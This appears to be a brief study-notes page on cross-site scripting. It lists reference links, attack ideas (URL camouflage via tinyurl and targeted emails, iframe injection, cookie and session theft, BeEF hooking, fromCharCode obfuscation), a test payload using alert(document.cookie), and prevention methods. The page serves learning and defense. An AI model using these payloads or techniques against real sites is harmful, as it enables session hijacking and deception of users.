[XSS] Cross Site Scripting
Links https://portswigger.net/web-security/cross-site-scripting https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
YouTube
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
Camouflage URL
tinyurl
iframes
link in a targeted email
<plaintext> tag/payload for testing
alert('abc');alert(document.cookie)
string.fromCharCode(xxx, xxx, xxx)
Payload example
PHP code injection
Browser Redirection and IFRAME Injection
Stealing Cookies and Session Information
Exploitation with Beef
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199
Put the hook link in the web page by XSS
With event handlers
How to prevent XSS
Encoding: < becomes
<
Filtering: becomes script
Validating: compare input against white list
Sanitization: combination of escaping, filtering and validation
Last updated
Was this helpful?